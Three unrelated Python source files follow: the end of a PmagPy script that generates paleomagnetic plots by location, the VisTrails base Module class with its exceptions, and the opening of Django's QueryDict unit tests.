data_container = all_data[dtype]
if loc_name == "./":
data_df = data_container.df
else:
# awkward workaround for chars like "(" and "?" that break in regex
try:
data_df = data_container.df[data_container.df['location'].astype(str).str.contains(loc_name, na=False)]
except: #sre_constants.error:
data_df = data_container.df[data_container.df['location'] == loc_name]
data = data_container.convert_to_pmag_data_list(df=data_df)
res = data_container.write_magic_file('tmp_{}.txt'.format(dtype), df=data_df)
if not res:
return [], []
return data, data_df
return [], []
meas_data, meas_df = get_data('measurements', loc)
spec_data, spec_df = get_data('specimens', loc)
samp_data, samp_df = get_data('samples', loc)
site_data, site_df = get_data('sites', loc)
loc_data, loc_df = get_data('locations', loc)
con = cb.Contribution(read_tables=[])
con.tables['measurements'] = cb.MagicDataFrame(df=meas_df, dtype="measurements")
con.tables['specimens'] = cb.MagicDataFrame(df=spec_df, dtype="specimens")
con.tables['samples'] = cb.MagicDataFrame(df=samp_df, dtype="samples")
con.tables['sites'] = cb.MagicDataFrame(df=site_df, dtype="sites")
con.tables['locations'] = cb.MagicDataFrame(df=loc_df, dtype="locations")
if loc == "./": # if you can't sort by location, do everything together
con = full_con
try:
meas_data = con.tables['measurements'].convert_to_pmag_data_list()
except KeyError:
meas_data = None
try:
spec_data = con.tables['specimens'].convert_to_pmag_data_list()
except KeyError:
spec_data = None
try:
samp_data = con.tables['samples'].convert_to_pmag_data_list()
except KeyError:
samp_data = None
try:
site_data = con.tables['sites'].convert_to_pmag_data_list()
except KeyError:
site_data = None
crd = 's'
if 'samples' in con.tables:
if 'azimuth' in con.tables['samples'].df.columns:
if any(con.tables['samples'].df['azimuth'].dropna()):
crd = 'g'
if crd == 's':
print('using specimen coordinates')
else:
print('using geographic coordinates')
if meas_file in filelist and meas_data: # start with measurement data
print('working on plotting measurements data')
data = meas_data
file_type = 'measurements'
# looking for zeq_magic possibilities
# get all non blank method codes
AFZrecs = pmag.get_dictitem(data, method_key, 'LT-AF-Z', 'has')
# get all non blank method codes
TZrecs = pmag.get_dictitem(data, method_key, 'LT-T-Z', 'has')
# get all non blank method codes
MZrecs = pmag.get_dictitem(data, method_key, 'LT-M-Z', 'has')
# get all dec measurements
Drecs = pmag.get_dictitem(data, dec_key, '', 'F')
# get all inc measurements
Irecs = pmag.get_dictitem(data, inc_key, '', 'F')
for key in Mkeys:
Mrecs = pmag.get_dictitem(
data, key, '', 'F') # get intensity data
if len(Mrecs) > 0:
break
# potential for stepwise demag curves
if len(AFZrecs) > 0 or len(TZrecs) > 0 or len(MZrecs) > 0 and len(Drecs) > 0 and len(Irecs) > 0 and len(Mrecs) > 0:
#CMD = 'zeq_magic.py -f tmp_measurements.txt -fsp tmp_specimens.txt -fsa tmp_samples.txt -fsi tmp_sites.txt -sav -fmt ' + fmt + ' -crd ' + crd + " -new"
CMD = "ipmag.zeq_magic(crd={}, n_plots='all', contribution={}, image_records=True, fmt={})".format(crd, con, fmt)
print(CMD)
info_log(CMD, loc)
res, outfiles, zeq_images = ipmag.zeq_magic(crd=crd, n_plots='all',
contribution=con, image_records=True, fmt=fmt)
image_recs.extend(zeq_images)
# looking for thellier_magic possibilities
if len(pmag.get_dictitem(data, method_key, 'LP-PI-TRM', 'has')) > 0:
#CMD = 'thellier_magic.py -f tmp_measurements.txt -fsp tmp_specimens.txt -sav -fmt ' + fmt
CMD = "ipmag.thellier_magic(n_specs='all', fmt='{}', contribution={}, image_records=True)".format(fmt, con)
print(CMD)
info_log(CMD, loc)
res, outfiles, thellier_images = ipmag.thellier_magic(n_specs='all', fmt=fmt, contribution=con, image_records=True)
image_recs.extend(thellier_images)
# looking for hysteresis possibilities
if len(pmag.get_dictitem(data, method_key, 'LP-HYS', 'has')) > 0: # find hyst experiments
# check for reqd columns
missing = check_for_reqd_cols(data, ['treat_temp'])
if missing:
error_log('LP-HYS method code present, but required column(s) [{}] missing'.format(", ".join(missing)), loc, "quick_hyst.py", con_id=con_id)
else:
#CMD = 'quick_hyst.py -f tmp_measurements.txt -sav -fmt ' + fmt
CMD = "ipmag.quick_hyst(fmt='{}', n_plots='all', contribution={}, image_records=True)".format(fmt, con)
print(CMD)
info_log(CMD, loc)
res, outfiles, quick_hyst_recs = ipmag.quick_hyst(fmt=fmt, n_plots='all', contribution=con, image_records=True)
image_recs.extend(quick_hyst_recs)
# equal area plots of directional data
# at measurement level (by specimen)
if data:
missing = check_for_reqd_cols(data, ['dir_dec', 'dir_inc'])
if not missing:
#CMD = "eqarea_magic.py -f tmp_measurements.txt -obj spc -sav -no-tilt -fmt " + fmt
CMD = "ipmag.eqarea_magic(fmt=fmt, n_plots='all', ignore_tilt=True, plot_by='spc', contribution={}, source_table='measurements', image_records=True)".format(fmt, con)
print(CMD)
info_log(CMD, loc, "eqarea_magic.py")
res, outfiles, eqarea_spc_images = ipmag.eqarea_magic(fmt=fmt, n_plots='all',
ignore_tilt=True, plot_by="spc",
contribution=con,
source_table="measurements",
image_records=True)
image_recs.extend(eqarea_spc_images)
else:
if VERBOSE:
print('-I- No measurement data found')
# site data
if results_file in filelist and site_data:
print('-I- result file found', results_file)
data = site_data
file_type = 'sites'
print('-I- working on site directions')
print('number of datapoints: ', len(data), loc)
dec_key = 'dir_dec'
inc_key = 'dir_inc'
int_key = 'int_abs'
SiteDIs = pmag.get_dictitem(data, dec_key, "", 'F') # find decs
SiteDIs = pmag.get_dictitem(
SiteDIs, inc_key, "", 'F') # find decs and incs
dir_data_found = len(SiteDIs)
print('{} Dec/inc pairs found'.format(dir_data_found))
if SiteDIs:
# then convert tilt_corr_key to correct format
old_SiteDIs = SiteDIs
SiteDIs = []
for rec in old_SiteDIs:
if tilt_corr_key not in rec:
rec[tilt_corr_key] = "0"
# make sure tilt_corr_key is a correct format
try:
rec[tilt_corr_key] = str(int(float(rec[tilt_corr_key])))
except ValueError:
rec[tilt_corr_key] = "0"
SiteDIs.append(rec)
print('number of individual directions: ', len(SiteDIs))
# tilt corrected coordinates
SiteDIs_t = pmag.get_dictitem(SiteDIs, tilt_corr_key, '100',
'T', float_to_int=True)
print('number of tilt corrected directions: ', len(SiteDIs_t))
SiteDIs_g = pmag.get_dictitem(
SiteDIs, tilt_corr_key, '0', 'T', float_to_int=True) # geographic coordinates
print('number of geographic directions: ', len(SiteDIs_g))
SiteDIs_s = pmag.get_dictitem(
SiteDIs, tilt_corr_key, '-1', 'T', float_to_int=True) # sample coordinates
print('number of sample directions: ', len(SiteDIs_s))
SiteDIs_x = pmag.get_dictitem(
SiteDIs, tilt_corr_key, '', 'T') # no coordinates
print('number of no coordinates directions: ', len(SiteDIs_x))
if len(SiteDIs_t) > 0 or len(SiteDIs_g) > 0 or len(SiteDIs_s) > 0 or len(SiteDIs_x) > 0:
CRD = ""
if len(SiteDIs_t) > 0:
CRD = ' -crd t'
crd = "t"
elif len(SiteDIs_g) > 0:
CRD = ' -crd g'
crd = "g"
elif len(SiteDIs_s) > 0:
CRD = ' -crd s'
crd = "s"
#CMD = 'eqarea_magic.py -f tmp_sites.txt -fsp tmp_specimens.txt -fsa tmp_samples.txt -flo tmp_locations.txt -sav -fmt ' + fmt + CRD
CMD = "ipmag.eqarea_magic(crd={}, fmt={}, n_plots='all', contribution={}, source_table='sites')".format(fmt, crd, con)
print(CMD)
info_log(CMD, loc)
res, outfiles, eqarea_site_recs = ipmag.eqarea_magic(crd=crd, fmt=fmt, n_plots='all',
contribution=con, source_table="sites",
image_records=True)
image_recs.extend(eqarea_site_recs)
else:
if dir_data_found:
error_log('{} dec/inc pairs found, but no equal area plots were made'.format(dir_data_found), loc, "equarea_magic.py", con_id=con_id)
#
print('-I- working on VGP map')
VGPs = pmag.get_dictitem(
SiteDIs, 'vgp_lat', "", 'F') # are there any VGPs?
if len(VGPs) > 0: # YES!
#CMD = 'vgpmap_magic.py -f tmp_sites.txt -prj moll -res c -sym ro 5 -sav -fmt {}'.format(fmt)
CMD = "ipmag.vgpmap_magic(proj='moll', sym='ro', size=5, fmt={}, contribution={})".format(fmt, con)
print(CMD)
info_log(CMD, loc, 'vgpmap_magic.py')
res, outfiles, vgpmap_recs = ipmag.vgpmap_magic(proj='moll', sym='ro', size=5,
fmt=fmt, contribution=con,
image_records=True)
image_recs.extend(vgpmap_recs)
else:
print('-I- No vgps found')
print('-I- Look for intensities')
# is there any intensity data?
if site_data:
if int_key in site_data[0].keys():
# old way, wasn't working right:
#CMD = 'magic_select.py -key ' + int_key + ' 0. has -F tmp1.txt -f tmp_sites.txt'
Selection = pmag.get_dictkey(site_data, int_key, dtype="f")
selection = [i * 1e6 for i in Selection if i != 0]
loc = loc.replace(" ", "_")
if loc == "./":
loc_name = ""
else:
loc_name = loc
histfile = 'LO:_' + loc_name + \
'_TY:_intensities_histogram:_.' + fmt
CMD = "histplot.py -twin -b 1 -xlab 'Intensity (uT)' -sav -f intensities.txt -F " + histfile
CMD = "ipmag.histplot(data=selection, outfile=histfile, xlab='Intensity (uT)', binsize=1, norm=-1, save_plots=True)".format(histfile)
info_log(CMD, loc)
print(CMD)
ipmag.histplot(data=selection, outfile=histfile, xlab="Intensity (uT)",
binsize=1, norm=-1, save_plots=True)
histplot_rec = {'file': histfile, 'type': 'Other', 'title': 'Intensity histogram',
'software_packages': version.version, 'keywords': "",
'timestamp': datetime.date.today().isoformat()}
image_recs.append(histplot_rec)
else:
print('-I- No intensities found')
else:
print('-I- No intensities found')
##
if hyst_file in filelist and spec_data:
print('working on hysteresis', hyst_file)
data = spec_data
file_type = 'specimens'
hdata = pmag.get_dictitem(data, hyst_bcr_key, '', 'F')
hdata = pmag.get_dictitem(hdata, hyst_mr_key, '', 'F')
hdata = pmag.get_dictitem(hdata, hyst_ms_key, '', 'F')
# there are data for a dayplot
hdata = pmag.get_dictitem(hdata, hyst_bc_key, '', 'F')
if len(hdata) > 0:
CMD = "ipmag.dayplot_magic(save=True, fmt={}, contribution={}, image_records=True)".format(fmt, con)
info_log(CMD, loc)
print(CMD)
res, outfiles, dayplot_recs = ipmag.dayplot_magic(save=True, fmt=fmt,
contribution=con, image_records=True)
image_recs.extend(dayplot_recs)
else:
print('no hysteresis data found')
if aniso_file in filelist and spec_data: # do anisotropy plots if possible
print('working on anisotropy', aniso_file)
data = spec_data
file_type = 'specimens'
# make sure there is some anisotropy data
if not data:
print('No anisotropy data found')
elif 'aniso_s' not in data[0]:
print('No anisotropy data found')
else:
# get specimen coordinates
if aniso_tilt_corr_key not in data[0]:
sdata = data
else:
sdata = pmag.get_dictitem(
data, aniso_tilt_corr_key, '-1', 'T', float_to_int=True)
# get specimen coordinates
gdata = pmag.get_dictitem(
data, aniso_tilt_corr_key, '0', 'T', float_to_int=True)
# get specimen coordinates
tdata = pmag.get_dictitem(
data, aniso_tilt_corr_key, '100', 'T', float_to_int=True)
if len(sdata) > 3:
CMD = "ipmag.aniso_magic(iboot=0, ihext=1, crd='s', fmt={}, contribution={})".format(fmt, con)
print(CMD)
info_log(CMD, loc)
res, files, aniso_recs = ipmag.aniso_magic(iboot=0, ihext=1, crd="s", fmt=fmt,
contribution=con, image_records=True)
image_recs.extend(aniso_recs)
if len(gdata) > 3:
CMD = "ipmag.aniso_magic(iboot=0, ihext=1, crd='g', fmt={}, contribution={})".format(fmt, con)
print(CMD)
info_log(CMD, loc)
res, files, aniso_recs = ipmag.aniso_magic(iboot=0, ihext=1, crd="g", fmt=fmt,
contribution=con, image_records=True)
image_recs.extend(aniso_recs)
if len(tdata) > 3:
CMD = "ipmag.aniso_magic(iboot=0, ihext=1, crd='g', fmt={}, contribution={})".format(fmt, con)
print(CMD)
info_log(CMD, loc)
res, files, aniso_recs = ipmag.aniso_magic(iboot=0, ihext=1, crd="t", fmt=fmt,
contribution=con, image_records=True)
image_recs.extend(aniso_recs)
# remove temporary files
for fname in glob.glob('tmp*.txt'):
os.remove(fname)
# now we need full contribution data
if loc_file in filelist and loc_data:
#data, file_type = pmag.magic_read(loc_file) # read in location data
data = loc_data
print('-I- working on pole map')
poles = pmag.get_dictitem(
data, 'pole_lat', "", 'F') # are there any poles?
poles = pmag.get_dictitem(
poles, 'pole_lon', "", 'F') # are there any poles?
if len(poles) > 0: # YES!
CMD = 'polemap_magic.py -sav -fmt {} -rev gv 40'.format(fmt)
CMD = 'ipmag.polemap_magic(flip=True, rsym="gv", rsymsize=40, fmt="{}", contribution={})'.format(fmt, full_con)
print(CMD)
info_log(CMD, "all locations", "polemap_magic.py")
res, outfiles, polemap_recs = ipmag.polemap_magic(flip=True, rsym="gv", rsymsize=40,
fmt=fmt, contribution=full_con,
image_records=True)
image_recs.extend(polemap_recs)
else:
print('-I- No poles found')
if image_recs:
new_image_file = os.path.join(dir_path, 'new_images.txt')
old_image_file = os.path.join(dir_path, 'images.txt')
pmag.magic_write(new_image_file, image_recs, 'images')
if os.path.exists(old_image_file):
ipmag.combine_magic([old_image_file, new_image_file], outfile=old_image_file,
magic_table="images", dir_path=dir_path)
else:
os.rename(new_image_file, old_image_file)
if do_thumbnails:
thumbnails.make_thumbnails(dir_path)
if __name__ == "__main__":
main()
| |
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
import copy
from core.data_structures.bijectivedict import Bidict
from core.utils import VistrailsInternalError
class NeedsInputPort(Exception):
def __init__(self, obj, port):
self.obj = obj
self.port = port
def __str__(self):
return "Module %s needs port %s" % (self.obj, self.port)
class IncompleteImplementation(Exception):
def __str__(self):
return "Module has incomplete implementation"
class MissingModule(Exception):
pass
class ModuleBreakpoint(Exception):
def __init__(self, module):
self.module = module
self.msg = "Hit breakpoint"
self.errorTrace = ''
def __str__(self):
retstr = "Encoutered breakpoint at Module %s:\n" % (self.module)
for k in self.module.__dict__.keys():
retstr += "\t%s = %s\n" % (k, self.module.__dict__[k])
inputs = self.examine_inputs()
retstr += "\nModule has inputs:\n"
for i in inputs.keys():
retstr += "\t%s = %s\n" % (i, inputs[i])
return retstr
def examine_inputs(self):
in_ports = self.module.__dict__["inputPorts"]
inputs = {}
for p in in_ports:
inputs[p] = self.module.getInputListFromPort(p)
return inputs
class ModuleError(Exception):
"""Exception representing a VisTrails module runtime error. This
exception is recognized by the interpreter and allows meaningful error
reporting to the user and to the logging mechanism."""
def __init__(self, module, errormsg):
"""ModuleError should be passed the module that signaled the
error and the error message as a string."""
Exception.__init__(self, errormsg)
self.module = module
self.msg = errormsg
import traceback
self.errorTrace = traceback.format_exc()
class ModuleSuspended(ModuleError):
"""Exception representing a VisTrails module being suspended. Raising
ModuleSuspended flags that the module is not ready to finish yet and
that the workflow should be executed later. A suspended module does
not execute the modules downstream but all modules upstream will be
executed. This is useful when executing external jobs where you do not
want to block vistrails while waiting for the execution to finish. """
def __init__(self, module, errormsg):
ModuleError.__init__(self, module, errormsg)
class ModuleErrors(Exception):
"""Exception representing a list of VisTrails module runtime errors.
This exception is recognized by the interpreter and allows meaningful
error reporting to the user and to the logging mechanism."""
def __init__(self, module_errors):
"""ModuleErrors should be passed a list of ModuleError objects"""
Exception.__init__(self, str(tuple(me.msg for me in module_errors)))
self.module_errors = module_errors
class _InvalidOutput(object):
""" Specify an invalid result
"""
pass
InvalidOutput = _InvalidOutput
################################################################################
# DummyModuleLogging
class DummyModuleLogging(object):
def end_update(*args, **kwargs): pass
def begin_update(*args, **kwargs): pass
def begin_compute(*args, **kwargs): pass
def update_cached(*args, **kwargs): pass
def signalSuccess(*args, **kwargs): pass
def annotate(*args, **kwargs): pass
_dummy_logging = DummyModuleLogging()
################################################################################
# Module
class Module(object):
"""Module is the base module from which all module functionality
is derived from in VisTrails. It defines a set of basic interfaces to
deal with data input/output (through ports, as will be explained
later), as well as a basic mechanism for dataflow based updates.
Execution Model
VisTrails assumes fundamentally that a pipeline is a dataflow. This
means that pipeline cycles are disallowed, and that modules are
supposed to be free of side-effects. This is obviously not possible
in general, particularly for modules whose sole purpose is to
interact with operating system resources. In these cases, designing
a module is harder -- the side effects should ideally not be exposed
to the module interface. VisTrails provides some support for making
this easier, as will be discussed later.
VisTrails caches intermediate results to increase efficiency in
exploration. It does so by reusing pieces of pipelines in later
executions.
Terminology
Module Interface: The module interface is the set of input and
output ports a module exposes.
Designing New Modules
Designing new modules is essentially a matter of subclassing this
module class and overriding the compute() method. There is a
fully-documented example of this on the default package
'pythonCalc', available on the 'packages/pythonCalc' directory.
Caching
Caching affects the design of a new module. Most importantly,
users have to account for compute() being called more than
once. Even though compute() is only called once per individual
execution, new connections might mean that previously uncomputed
output must be made available.
Also, operating system side-effects must be carefully accounted
for. Some operations are fundamentally side-effectful (creating OS
output like uploading a file on the WWW or writing a file to a
local hard drive). These modules should probably not be cached at
all. VisTrails provides an easy way for modules to report that
they should not be cached: simply subclass from the NotCacheable
mixin provided in this python module. (NB: In order for the mixin
to work appropriately, NotCacheable must appear *BEFORE* any other
subclass in the class hierarchy declarations). These modules (and
anything that depends on their results) will then never be reused.
Intermediate Files
Many modules communicate through intermediate files. VisTrails
provides automatic filename and handle management to alleviate the
burden of determining tricky things (e.g. longevity) of these
files. Modules can request temporary file names through the file pool,
currently accessible through
self.interpreter.filePool
The FilePool class is available in core/modules/module_utils.py -
consult its documentation for usage. Notably, using the file pool
will make temporary files work correctly with caching, and will
make sure the temporaries are correctly removed.
"""
def __init__(self):
self.inputPorts = {}
self.outputPorts = {}
self.upToDate = False
self.setResult("self", self) # every object can return itself
self.logging = _dummy_logging
# isMethod stores whether a certain input port is a method.
# If so, isMethod maps the port to the order in which it is
# stored. This is so that modules that need to know about the
# method order can work correctly
self.is_method = Bidict()
self._latest_method_order = 0
# Pipeline info that a module should know about This is useful
# for a spreadsheet cell to know where it is from. It will be
# also used for talking back and forth between the spreadsheet
# and the builder besides Parameter Exploration.
self.moduleInfo = {
'locator': None,
'vistrailName': 'Unknown',
'version': -1,
'pipeline': None,
'moduleId': -1,
'reason': 'Pipeline Execution',
'actions': []
}
self.is_breakpoint = False
# is_fold_operator stores wether the module is a part of a fold
self.is_fold_operator = False
# is_fold_module stores whether the module is a fold module
self.is_fold_module = False
# computed stores wether the module was computed
# used for the logging stuff
self.computed = False
self.suspended = False
self.signature = None
def clear(self):
"""clear(self) -> None. Removes all references, prepares for
deletion."""
for connector_list in self.inputPorts.itervalues():
for connector in connector_list:
connector.clear()
self.inputPorts = {}
self.outputPorts = {}
self.logging = _dummy_logging
self.is_method = Bidict()
self._latest_method_order = 0
def is_cacheable(self):
"""is_cacheable() -> bool. A Module should return whether it
can be reused across executions. It is safe for a Module to return
different values in different occasions. In other words, it is
possible for modules to be cacheable depending on their execution
context."""
return True
def updateUpstreamPort(self, port):
# update single port
if port in self.inputPorts:
for connector in self.inputPorts[port]:
connector.obj.update()
if hasattr(connector.obj, 'suspended') and \
connector.obj.suspended:
self.suspended = connector.obj.suspended
for connector in copy.copy(self.inputPorts[port]):
if connector.obj.get_output(connector.port) is InvalidOutput:
self.removeInputConnector(port, connector)
def updateUpstream(self):
""" updateUpstream() -> None
Go upstream from the current module, then update its upstream
modules and check input connection based on upstream modules
results
"""
for connectorList in self.inputPorts.itervalues():
for connector in connectorList:
connector.obj.update()
if hasattr(connector.obj, 'suspended') and \
connector.obj.suspended:
self.suspended = connector.obj.suspended
for iport, connectorList in copy.copy(self.inputPorts.items()):
for connector in connectorList:
if connector.obj.get_output(connector.port) is InvalidOutput:
self.removeInputConnector(iport, connector)
def update(self):
""" update() -> None
Check if the module is up-to-date then update the
modules. Report to the logger if available
"""
self.logging.begin_update(self)
self.updateUpstream()
if self.suspended:
return
if self.upToDate:
if not self.computed:
self.logging.update_cached(self)
self.computed = True
return
self.logging.begin_compute(self)
try:
if self.is_breakpoint:
raise ModuleBreakpoint(self)
self.compute()
self.computed = True
except ModuleSuspended, e:
self.suspended = e.msg
self.logging.end_update(self, e.msg, was_suspended=True)
self.logging.signalSuspended(self)
return
except ModuleError, me:
if hasattr(me.module, 'interpreter'):
raise
else:
msg = "A dynamic module raised an exception: '%s'"
msg %= str(me)
raise ModuleError(self, msg)
except ModuleErrors:
raise
except KeyboardInterrupt, e:
raise ModuleError(self, 'Interrupted by user')
except ModuleBreakpoint:
raise
except Exception, e:
import traceback
traceback.print_exc()
raise ModuleError(self, 'Uncaught exception: "%s"' % str(e))
self.upToDate = True
self.logging.end_update(self)
self.logging.signalSuccess(self)
def checkInputPort(self, name):
"""checkInputPort(name) -> None.
Makes sure input port 'name' is filled."""
if not self.hasInputFromPort(name):
raise ModuleError(self, "'%s' is a mandatory port" % name)
def compute(self):
pass
def setResult(self, port, value):
self.outputPorts[port] = value
def get_output(self, port):
# if self.outputPorts.has_key(port) or not self.outputPorts[port]:
if port not in self.outputPorts:
raise ModuleError(self, "output port '%s' not found" % port)
return self.outputPorts[port]
def getInputConnector(self, inputPort):
if not self.inputPorts.has_key(inputPort):
raise ModuleError(self, "Missing value from port %s" % inputPort)
return self.inputPorts[inputPort][0]
def getInputFromPort(self, inputPort):
if not self.inputPorts.has_key(inputPort):
raise ModuleError(self, "Missing value from port %s" % inputPort)
# Cannot resolve circular reference here, need to be fixed later
from core.modules.sub_module import InputPort
for conn in self.inputPorts[inputPort]:
if type(conn.obj)==InputPort:
return conn()
return self.inputPorts[inputPort][0]()
def hasInputFromPort(self, inputPort):
return self.inputPorts.has_key(inputPort)
def __str__(self):
return "<<%s>>" % str(self.__class__)
def annotate(self, d):
self.logging.annotate(self, d)
def forceGetInputFromPort(self, inputPort, defaultValue=None):
if self.hasInputFromPort(inputPort):
return self.getInputFromPort(inputPort)
else:
return defaultValue
def set_input_port(self, inputPort, conn, is_method=False):
if self.inputPorts.has_key(inputPort):
self.inputPorts[inputPort].append(conn)
else:
self.inputPorts[inputPort] = [conn]
if is_method:
self.is_method[conn] = (self._latest_method_order, inputPort)
self._latest_method_order += 1
def getInputListFromPort(self, inputPort):
if not self.inputPorts.has_key(inputPort):
raise ModuleError(self, "Missing value from port %s" % inputPort)
# Cannot resolve circular reference here, need to be fixed later
from core.modules.sub_module import InputPort
fromInputPortModule = [connector()
for connector in self.inputPorts[inputPort]
if type(connector.obj)==InputPort]
if len(fromInputPortModule)>0:
return fromInputPortModule
return [connector() for connector in self.inputPorts[inputPort]]
def forceGetInputListFromPort(self, inputPort):
if not self.inputPorts.has_key(inputPort):
return []
return self.getInputListFromPort(inputPort)
def enableOutputPort(self, outputPort):
""" enableOutputPort(outputPort: str) -> None
Set an output port to be active to store result of computation
"""
# Don't reset existing values, it screws up the caching.
if not self.outputPorts.has_key(outputPort):
self.setResult(outputPort, None)
def removeInputConnector(self, inputPort, connector):
""" removeInputConnector(inputPort: str,
connector: ModuleConnector) -> None
Remove a connector from the connection list of an input port
"""
if self.inputPorts.has_key(inputPort):
conList = self.inputPorts[inputPort]
if connector in conList:
conList.remove(connector)
if conList==[]:
del self.inputPorts[inputPort]
def create_instance_of_type(self, ident, name, ns=''):
""" Create a vistrails module from the module registry. This creates an instance of the module
for use in creating the object output by a Module.
"""
# FIXME (DAK): I don't get this, shouldn't we import module_registry?
import core.modules.vistrails_module
try:
reg = core.modules.module_registry.get_module_registry()
m = reg.get_module_by_name(ident, name, ns)
return m()
except:
msg = "Cannot get module named " + str(name) + " with identifier " + str(ident) + " and namespace " + ns
raise ModuleError(self, msg)
@classmethod
def provide_input_port_documentation(cls, port_name):
return None
@classmethod
def provide_output_port_documentation(cls, port_name):
return None
################################################################################
class NotCacheable(object):
def is_cacheable(self):
return False
################################################################################
class ModuleConnector(object):
def __init__(self, obj, port, spec=None):
self.obj = obj
self.port = port
def clear(self):
"""clear() -> None. Removes references, prepares for deletion."""
self.obj = None
self.port = None
def __call__(self):
return self.obj.get_output(self.port)
def new_module(baseModule, name, dict={}, docstring=None):
"""new_module(baseModule or [baseModule list],
name,
dict={},
docstring=None
Creates a new VisTrails module dynamically. Exactly one of the
elements of the baseModule list (or baseModule itself, in the case
it's a single class) should be a subclass of Module.
"""
if type(baseModule) == type:
assert issubclass(baseModule, Module)
superclasses = (baseModule, )
elif type(baseModule) == list:
assert len([x for x in baseModule
if issubclass(x, Module)]) == 1
superclasses = tuple(baseModule)
d = copy.copy(dict)
if docstring:
d['__doc__'] = docstring
return type(name, superclasses, d)
# This is the gist of how type() works. The example is run from a python
# toplevel
# >>> class X(object):
# ... def f(self): return 3
# ...
# >>> a = X()
# >>> a.f()
# 3
# >>> Y = type('Y', (X, ), {'g': lambda x : 4})
# >>> b = Y()
# >>> b.f()
# 3
# >>> b.g()
# 4
# >>> Z = type('Z', (X, ), {'f': lambda x : 4} )
# >>> c = Z()
# >>> c.f()
# 4
| |
import copy
import pickle
from django.http import (QueryDict, HttpResponse, SimpleCookie, BadHeaderError,
parse_cookie)
from django.utils import unittest
class QueryDictTests(unittest.TestCase):
def test_missing_key(self):
q = QueryDict('')
self.assertRaises(KeyError, q.__getitem__, 'foo')
def test_immutability(self):
q = QueryDict('')
self.assertRaises(AttributeError, q.__setitem__, 'something', 'bar')
self.assertRaises(AttributeError, q.setlist, 'foo', ['bar'])
self.assertRaises(AttributeError, q.appendlist, 'foo', ['bar'])
self.assertRaises(AttributeError, q.update, {'foo': 'bar'})
self.assertRaises(AttributeError, q.pop, 'foo')
self.assertRaises(AttributeError, q.popitem)
self.assertRaises(AttributeError, q.clear)
def test_immutable_get_with_default(self):
q = QueryDict('')
self.assertEqual(q.get('foo', 'default'), 'default')
def test_immutable_basic_operations(self):
q = QueryDict('')
self.assertEqual(q.getlist('foo'), [])
self.assertEqual(q.has_key('foo'), False)
self.assertEqual('foo' in q, False)
self.assertEqual(q.items(), [])
self.assertEqual(q.lists(), [])
self.assertEqual(q.items(), [])
self.assertEqual(q.keys(), [])
self.assertEqual(q.values(), [])
self.assertEqual(len(q), 0)
self.assertEqual(q.urlencode(), '')
def test_single_key_value(self):
"""Test QueryDict with one key/value pair"""
q = QueryDict('foo=bar')
self.assertEqual(q['foo'], 'bar')
self.assertRaises(KeyError, q.__getitem__, 'bar')
self.assertRaises(AttributeError, q.__setitem__, 'something', 'bar')
self.assertEqual(q.get('foo', 'default'), 'bar')
self.assertEqual(q.get('bar', 'default'), 'default')
self.assertEqual(q.getlist('foo'), ['bar'])
self.assertEqual(q.getlist('bar'), [])
self.assertRaises(AttributeError, q.setlist, 'foo', ['bar'])
self.assertRaises(AttributeError, q.appendlist, 'foo', ['bar'])
self.assertTrue(q.has_key('foo'))
self.assertTrue('foo' in q)
self.assertFalse(q.has_key('bar'))
self.assertFalse('bar' in q)
self.assertEqual(q.items(), [(u'foo', u'bar')])
self.assertEqual(q.lists(), [(u'foo', [u'bar'])])
self.assertEqual(q.keys(), ['foo'])
self.assertEqual(q.values(), ['bar'])
self.assertEqual(len(q), 1)
self.assertRaises(AttributeError, q.update, {'foo': 'bar'})
self.assertRaises(AttributeError, q.pop, 'foo')
self.assertRaises(AttributeError, q.popitem)
self.assertRaises(AttributeError, q.clear)
self.assertRaises(AttributeError, q.setdefault, 'foo', 'bar')
self.assertEqual(q.urlencode(), 'foo=bar')
def test_urlencode(self):
q = QueryDict('', mutable=True)
q['next'] = '/a&b/'
self.assertEqual(q.urlencode(), 'next=%2Fa%26b%2F')
self.assertEqual(q.urlencode(safe='/'), 'next=/a%26b/')
q = QueryDict('', mutable=True)
q['next'] = u'/t\xebst&key/'
self.assertEqual(q.urlencode(), 'next=%2Ft%C3%ABst%26key%2F')
self.assertEqual(q.urlencode(safe='/'), 'next=/t%C3%ABst%26key/')
def test_mutable_copy(self):
"""A copy of a QueryDict is mutable."""
q = QueryDict('').copy()
self.assertRaises(KeyError, q.__getitem__, "foo")
q['name'] = 'john'
self.assertEqual(q['name'], 'john')
def test_mutable_delete(self):
q = QueryDict('').copy()
q['name'] = 'john'
del q['name']
self.assertFalse('name' in q)
def test_basic_mutable_operations(self):
q = QueryDict('').copy()
q['name'] = 'john'
self.assertEqual(q.get('foo', 'default'), 'default')
self.assertEqual(q.get('name', 'default'), 'john')
self.assertEqual(q.getlist('name'), ['john'])
self.assertEqual(q.getlist('foo'), [])
q.setlist('foo', ['bar', 'baz'])
self.assertEqual(q.get('foo', 'default'), 'baz')
self.assertEqual(q.getlist('foo'), ['bar', 'baz'])
q.appendlist('foo', 'another')
self.assertEqual(q.getlist('foo'), ['bar', 'baz', 'another'])
